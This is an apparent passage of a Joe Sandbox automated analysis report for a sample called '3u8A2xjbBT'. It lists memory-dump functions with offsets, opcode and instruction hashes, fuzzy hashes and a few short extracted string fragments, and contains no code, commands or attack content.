                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 90d14373c88f3401d4ad391110b78624ebb13e21d1bc5bd1ee65972d0ac917b2
                                      • Instruction ID: 0c34ab9a001975f6ea5b72d529844057dcf22ecc35432051f60e669a0e3525b4
                                      • Opcode Fuzzy Hash: 90d14373c88f3401d4ad391110b78624ebb13e21d1bc5bd1ee65972d0ac917b2
                                      • Instruction Fuzzy Hash: 25F0C2B0D15248AFCB95DFA9D418AACBFF4EB5A310F0085AAC819E7250E6355A49CF41
                                      Function 0B6B1181 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c096deef328bcc8e31a769766b6bbcfa9eb002af4f50c2ffafd1bdf2c1a9d9b6
                                      • Instruction ID: 5f91035d73e375513e087362d6da73b08f1dc1143fcddb7a8283816477ecc202
                                      • Opcode Fuzzy Hash: c096deef328bcc8e31a769766b6bbcfa9eb002af4f50c2ffafd1bdf2c1a9d9b6
                                      • Instruction Fuzzy Hash: 9CE06570D14248AFCB50EFB8D454A9CBFB0AB46200F0081EAC829E7290E7348A08CF80
                                      Function 0BBEF3B9 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 414f804885313476ca2df8263023bb34f54c9785d1cc841313004557109c1a9d
                                      • Instruction ID: d90b57ad183920bd9e4f59b50d4eb092ee97e7010934228ce4e4233ebcef56da
                                      • Opcode Fuzzy Hash: 414f804885313476ca2df8263023bb34f54c9785d1cc841313004557109c1a9d
                                      • Instruction Fuzzy Hash: F7E0E5B0D10308AFCB94DFA8D0213EDBBB1EB54341F4081AA8829A3258E7344E048F40
                                      Function 0BBEDDD8 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb6c98d38ebdfac6c2ab66024a3d56b23202b7c9865707aefa6428ee27839f05
                                      • Instruction ID: 94f467c616581b0192175701cd7ca593762c9549acfc0fbbc83bdaf888499934
                                      • Opcode Fuzzy Hash: bb6c98d38ebdfac6c2ab66024a3d56b23202b7c9865707aefa6428ee27839f05
                                      • Instruction Fuzzy Hash: DBE0E5B1D15208AFCB94EFB8E0543DDBBB0EB65201F1085BEC81AA7794E7354944CF50
                                      Function 0B6B67C0 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dbd8056c1bd4438442e56063837c288b14358093e338be874d916696fe64cfc2
                                      • Instruction ID: 913332f960eb0bf9591575accdc0c0fdd3d985cb457651befabb81d9ef2127ed
                                      • Opcode Fuzzy Hash: dbd8056c1bd4438442e56063837c288b14358093e338be874d916696fe64cfc2
                                      • Instruction Fuzzy Hash: B1E0ED74D0020DAFCB40EFA8D800AADBBF4FB08310F508569D824A3344D7715655DB80
                                      Function 0B6B1AAB Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 510eefc0488fa07ddf70f33d70fa5d84f222cd7bbe4d390f4b0c3de6af424a8d
                                      • Instruction ID: 96c646aa768645b9ab4477b52c8ad3673970928b084f866342ea9563a618b353
                                      • Opcode Fuzzy Hash: 510eefc0488fa07ddf70f33d70fa5d84f222cd7bbe4d390f4b0c3de6af424a8d
                                      • Instruction Fuzzy Hash: D3E03079E1431DDFCB14CF75D840A8DF7B2BF8A300F1093A581499B224E730A5429F41
                                      Function 0B6B42B0 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 654837363fa7c7c9577fb9a2496e5c7c90ad75482d04a34b8312a0f848764afc
                                      • Instruction ID: df761e803cdb748cbf82938a663b2e1f67d3db93538cbcce989463c7e6934122
                                      • Opcode Fuzzy Hash: 654837363fa7c7c9577fb9a2496e5c7c90ad75482d04a34b8312a0f848764afc
                                      • Instruction Fuzzy Hash: 13E01A74900208EFCB90EFA8D448E9DBBB4FF49310F00C1A9E819A7361D7319A94EF84
                                      Function 0B6B1568 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 787905ee9273c6ec2f838ce8812100a6acfad02f67a876f7bed3c2dc29ede6b9
                                      • Instruction ID: 7eb9ec519c253e15adadfbe26c1c19bdb211ff5938a755cac49b229a1206ee0c
                                      • Opcode Fuzzy Hash: 787905ee9273c6ec2f838ce8812100a6acfad02f67a876f7bed3c2dc29ede6b9
                                      • Instruction Fuzzy Hash: 09E09AF8904245AFC724DBA8C1A4A9CBFB0AF46320F1041CAD9256B3E1DB359940CF81
                                      Function 0B6B1578 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bb334d110e01e463de6e561ad8966adfe99c2a6fb2d1f3a47303f3e1152a3f5
                                      • Instruction ID: 9494fcd7330c340245628f559d79c63c4cef9b1bb8b21d94f2f6534a26f68012
                                      • Opcode Fuzzy Hash: 6bb334d110e01e463de6e561ad8966adfe99c2a6fb2d1f3a47303f3e1152a3f5
                                      • Instruction Fuzzy Hash: 26E092B4E10208AFCB54DFA8D454A9CBBF4FB49200F4081EAD919E7361E7359A44CF81
                                      Function 0B6B15C0 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c7e438bb197796767208a82f6841746eb3d73dc5424edc558a304fbb9821991f
                                      • Instruction ID: d9465bd5acfe28724b0302ca4939800a45d41965b33450704ecbaf0680c57809
                                      • Opcode Fuzzy Hash: c7e438bb197796767208a82f6841746eb3d73dc5424edc558a304fbb9821991f
                                      • Instruction Fuzzy Hash: 19E08CB1D04208BFC750DFA8E800BAEBBB8AB45300F0081AA9915A3340D6304A80DB94
                                      Function 0B6B2229 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 214591e076be1eb50bbba6143e5ae75c7d8c5a679f15948c4c01cc95b6059776
                                      • Instruction ID: db797f7f92d91a66f5a9f10fda5d60e01878c32bd3997dba484afb8182b65dc2
                                      • Opcode Fuzzy Hash: 214591e076be1eb50bbba6143e5ae75c7d8c5a679f15948c4c01cc95b6059776
                                      • Instruction Fuzzy Hash: 6FE0ECB0D10208AFDF64EFB8D4597DCBFF0EB59311F5041A98905E3384EA750545DB81
                                      Function 0BBE3A90 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc72cf53ae239fb572ba96e7176c0bced2095396d24aa51be8ce74132ab6e54c
                                      • Instruction ID: 54d532f28df7c8d0d999aed2d47651f17741bda7aacdc4f8a13057f4b3792e9a
                                      • Opcode Fuzzy Hash: fc72cf53ae239fb572ba96e7176c0bced2095396d24aa51be8ce74132ab6e54c
                                      • Instruction Fuzzy Hash: B9E0C2777041909FCB128B44E0104BEBF63DFCA322B2840AED54563641CB21EC03C7D0
                                      Function 0BBEDF9A Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d7ae3f590398b62f7c747a2b03034293a9e3faeab72e10ee967bfdb15cb3dee7
                                      • Instruction ID: 0f22dc4037256219dfceb25f6b65699206afbc4dc9b979cd15c88cca56394c23
                                      • Opcode Fuzzy Hash: d7ae3f590398b62f7c747a2b03034293a9e3faeab72e10ee967bfdb15cb3dee7
                                      • Instruction Fuzzy Hash: 3AE04670C50309AFCBA0EFB8E048A9CBFB4EB0A301F2052A9C815E7214E7710A48DB51
                                      Function 0BBE1D81 Relevance: .0, Instructions: 19COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ff354281f9727ed0a75d7acfec979d948c28c4c25ff2bdb59a146c2103fdafb4
                                      • Instruction ID: 76593b41f404aa978b57e65b2272ade1def8a75d2b7c405c4e3dd38946d4a268
                                      • Opcode Fuzzy Hash: ff354281f9727ed0a75d7acfec979d948c28c4c25ff2bdb59a146c2103fdafb4
                                      • Instruction Fuzzy Hash: 44E02B31700B400FE376D738D8517C6BFD75FD1200F048A5D80828B599DF64AD0AC382
                                      Function 0BBEDFA0 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 880377425893e2834a3a2a9a4091f204e211739cc7c929765eec41dcc68eecf7
                                      • Instruction ID: cce6fd32f220a77ec8f69f35d14340ce4effdd860d25df53a67a6540c555dff2
                                      • Opcode Fuzzy Hash: 880377425893e2834a3a2a9a4091f204e211739cc7c929765eec41dcc68eecf7
                                      • Instruction Fuzzy Hash: 3CE08C30C00308AFC710EFB8E448B4CBBB8EB09301F2052A8C814E7204E7701A48DB91
                                      Function 0BBE4E98 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc5b8da8dc8b3649b215da8094e9be5beea340430274df1fd477921195509569
                                      • Instruction ID: 3994f21645a558d58e3626c965665d1b976c891e34bba0665fa8e9d67f461263
                                      • Opcode Fuzzy Hash: fc5b8da8dc8b3649b215da8094e9be5beea340430274df1fd477921195509569
                                      • Instruction Fuzzy Hash: BFE08C306002149FC364DB18E544A56B7F8FF44210F409929D00687B11CBB0FD00CFA1
                                      Function 0B6B1190 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a734a262f5127da032867c50c105f9d3aabb9fa0a254baf92e826cc45eb45d4f
                                      • Instruction ID: 8c34b16aa66066490081320c222c293ff7284fcb76b8822f6775307187d71b9f
                                      • Opcode Fuzzy Hash: a734a262f5127da032867c50c105f9d3aabb9fa0a254baf92e826cc45eb45d4f
                                      • Instruction Fuzzy Hash: 25E0E2B0D10209BFCB90EFA8D44479DBBF4AB05200F0081AA9829A7380E7349A44CF81
                                      Function 0BBEF3C8 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5196392bd657b05840cd1806a63139e9790e14f6395a97786f0722e826e67255
                                      • Instruction ID: 6fb87c5038682b7fb9b554a729ba96fd7e723ff3d45843c90d7e96bfe1c4f628
                                      • Opcode Fuzzy Hash: 5196392bd657b05840cd1806a63139e9790e14f6395a97786f0722e826e67255
                                      • Instruction Fuzzy Hash: AFE0E270D00308EFCB90EFA9D44579DBBF4EB08200F4081EA8828A3250E7349A04DF81
                                      Function 0BBE3AA0 Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4da20395ca345d5bff70db45d44d5b77bc28f9925120837a66b77a1e0e1930b2
                                      • Instruction ID: 72d386cb91a79f165064e870088e3ab3e42e6544a61c82bec521a77d05f3df96
                                      • Opcode Fuzzy Hash: 4da20395ca345d5bff70db45d44d5b77bc28f9925120837a66b77a1e0e1930b2
                                      • Instruction Fuzzy Hash: 95D0A7323001106F87005A45E0008AEBBAADECA132324409ED44567301C731FC43C7E1
                                      Function 0B6B3268 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1af0056b1e0df3cf384c92e4b2358f61bf1cc15c509681c6c483988708860fb4
                                      • Instruction ID: 899a9ac8b8f8e32dc04448c3cd608b1fc78c4de98cfc1853a13bedfc24610787
                                      • Opcode Fuzzy Hash: 1af0056b1e0df3cf384c92e4b2358f61bf1cc15c509681c6c483988708860fb4
                                      • Instruction Fuzzy Hash: FFD0A77090020CAFC760EBB89404B5DBBB4AB01300F4001A8880453390E7304944D795
                                      Function 0B6B3259 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e57c4f3fe34dcaa8d03e0fb3d0e1b05ba1c526859f45927d304bd4636b618180
                                      • Instruction ID: 67a9f14475c73f7c914758069fe3d24be753e42e0649ba9e6a96549f9b314296
                                      • Opcode Fuzzy Hash: e57c4f3fe34dcaa8d03e0fb3d0e1b05ba1c526859f45927d304bd4636b618180
                                      • Instruction Fuzzy Hash: 77D02B9050928357C73593E89514F693E605F43230F0843DE85711A1E2CB641841E3CA
                                      Function 0B6B2238 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 159257375803116f62aa0570c25fc5adcfa7f7335d6b52885ce13991350e99c9
                                      • Instruction ID: 39e4a6f3c69f5be4dd8b2b4e294910bb9745eae8c5e298928f033db05df813cf
                                      • Opcode Fuzzy Hash: 159257375803116f62aa0570c25fc5adcfa7f7335d6b52885ce13991350e99c9
                                      • Instruction Fuzzy Hash: E5D05E70C00308AFCB50EFBC940578CBFF4AB04200F5041A58908D3244F6304684D791
                                      Function 0BBE7822 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c37f7ff7e514a57e381c3ed94cc2c80a5e4b834dfbccdd3a37e7e478f9dc20a7
                                      • Instruction ID: 421a598398fa8fca539d7c3524a981cc0a27da554d3df50abf84d1224b90e1bc
                                      • Opcode Fuzzy Hash: c37f7ff7e514a57e381c3ed94cc2c80a5e4b834dfbccdd3a37e7e478f9dc20a7
                                      • Instruction Fuzzy Hash: 78D012B6A212048FEF694B21C4242A13B53EFE6211B9900ED40069B5A5EF266C43D704

                                      Non-executed Functions

                                      Function 0BBE5208 Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /q$"\t$"\t$"\t$"\t$"\t$(Tt$^\t$$q
                                      • API String ID: 0-1602154313
                                      • Opcode ID: bac873b1b2a1ec6290ab3e7bc803e590a505daab7685691a5bd086fd2ce5dfcc
                                      • Instruction ID: fb7f9d42871042d4804fd936aa16a29a123bebf2c2960329515d872844c26433
                                      • Opcode Fuzzy Hash: bac873b1b2a1ec6290ab3e7bc803e590a505daab7685691a5bd086fd2ce5dfcc
                                      • Instruction Fuzzy Hash: 81125034B002059FDB29DF68D594A6EBBF2FFC8204B148569D41ADB365DB34ED02CBA1
                                      Function 01666608 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,',$xm[4
                                      • API String ID: 0-2059884342
                                      • Opcode ID: c3b0c7e2c5ad3a934821278c4875ba26fb3765006f748af3233d1fa12f3d1af2
                                      • Instruction ID: 29d20767ad19037ee0fe06c9cc49030a685bd91dad3e0a11bbbebb852b85cdcb
                                      • Opcode Fuzzy Hash: c3b0c7e2c5ad3a934821278c4875ba26fb3765006f748af3233d1fa12f3d1af2
                                      • Instruction Fuzzy Hash: A7410CB0D0461ADFCB04CF9AE9815AEFBF6BB88300F24D469C515F7254D7349A428F95
                                      Function 016665F9 Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,',$xm[4
                                      • API String ID: 0-2059884342
                                      • Opcode ID: 6f06f14529fdd6dbb3d369756fdfe96e691789e8169f072bdbd1454f92928cd2
                                      • Instruction ID: 69537862ace631ac3f63b40e61d8229f5aa06c12a517059b4fc070ca7614e6b2
                                      • Opcode Fuzzy Hash: 6f06f14529fdd6dbb3d369756fdfe96e691789e8169f072bdbd1454f92928cd2
                                      • Instruction Fuzzy Hash: 59412BB0E0461A9FCB04CFAAD8815AEFBF6BF88300F14D46AC515F7254D7349A428F95
                                      Function 01666251 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0EH
                                      • API String ID: 0-1654830957
                                      • Opcode ID: 8cb656e2ad67558c190d1c318f4aaa6432934c00432a85a91ba240257631c786
                                      • Instruction ID: 0d39a12a0568e71af16dd1353249d4fc21fb2fdbfa73ea81879103eebc46e3c3
                                      • Opcode Fuzzy Hash: 8cb656e2ad67558c190d1c318f4aaa6432934c00432a85a91ba240257631c786
                                      • Instruction Fuzzy Hash: 676136B0E0424A9FCB14CFAAE8805EEFBB6FF88300F14C56AD455B7254D7749A528F94
                                      Function 01666848 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: G6{A
                                      • API String ID: 0-3396466561
                                      • Opcode ID: 935492cda50ddfa9f076231da014219a70f94ba599505752e0f9fdc9eac3ac6b
                                      • Instruction ID: 382f5231f8d564e56c67c32ce7b3e36ff3ba79ea080b92026b2d6b83b6ba47bc
                                      • Opcode Fuzzy Hash: 935492cda50ddfa9f076231da014219a70f94ba599505752e0f9fdc9eac3ac6b
                                      • Instruction Fuzzy Hash: D151F3B4E05609DFCB08CFAAD9809DEFBF6BF88210F24952AD815B7354D7349942CB64
                                      Function 01666838 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: G6{A
                                      • API String ID: 0-3396466561
                                      • Opcode ID: ec7f88553742abee8d8b7ed23f157b53f98a4a92a85017e4dc4874c22af9fd96
                                      • Instruction ID: e14eb8ef0eac97a409a2e6a147bc0b5b65d43c6c774622455a75b1f730d454f1
                                      • Opcode Fuzzy Hash: ec7f88553742abee8d8b7ed23f157b53f98a4a92a85017e4dc4874c22af9fd96
                                      • Instruction Fuzzy Hash: A851E474E052099FCB04CFAAD9809DEFBF6AF89210F24956AD415B7354D3349942CB64
                                      Function 016649E8 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AcD^
                                      • API String ID: 0-1354458063
                                      • Opcode ID: 92730960a1433e3a95601b7317821bd320692eebb67a39f122439148065d774c
                                      • Instruction ID: 48915dabb9fff9018514c5a584c7284ad6a2a858991bdc6bf42f52fb102fd3a3
                                      • Opcode Fuzzy Hash: 92730960a1433e3a95601b7317821bd320692eebb67a39f122439148065d774c
                                      • Instruction Fuzzy Hash: 4E412770E0521A9FDB04CFA9C8405AEFBF5FF89210F14956AD415B7218DB309A46CFA5
                                      Function 0166894A Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: mp
                                      • API String ID: 0-2937697578
                                      • Opcode ID: 297197a0c085c4a5ccd8b51316c571d0f149b504059c8741fa10cbe3895b6087
                                      • Instruction ID: 2984f1e638196dc1fd7dbb4cefcec4815089e9eb4d2a0acbcc8d3013e677f5a6
                                      • Opcode Fuzzy Hash: 297197a0c085c4a5ccd8b51316c571d0f149b504059c8741fa10cbe3895b6087
                                      • Instruction Fuzzy Hash: 8B310A70E142098BCB54CFFEC88059EFBBAEFC9311F18D52AC419AB358D23494528F19
                                      Function 0BBE0006 Relevance: .8, Instructions: 801COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f76bda93e29160eadb812c6bbabfeedd94bcb5c0e30ded5006bf955a076facc9
                                      • Instruction ID: d683a799be8233ef428661fd50e5eb8925f6673a1b999675ffd6904d6b5e6088
                                      • Opcode Fuzzy Hash: f76bda93e29160eadb812c6bbabfeedd94bcb5c0e30ded5006bf955a076facc9
                                      • Instruction Fuzzy Hash: DF6219B06003019FE749DF59D45876A7AE6BBC4308F24C59CC0099F396CBBAE90B9BD5
                                      Function 0BBE0040 Relevance: .8, Instructions: 780COMMON
                                      Download Yara Rule
                                      Memory Dump Source
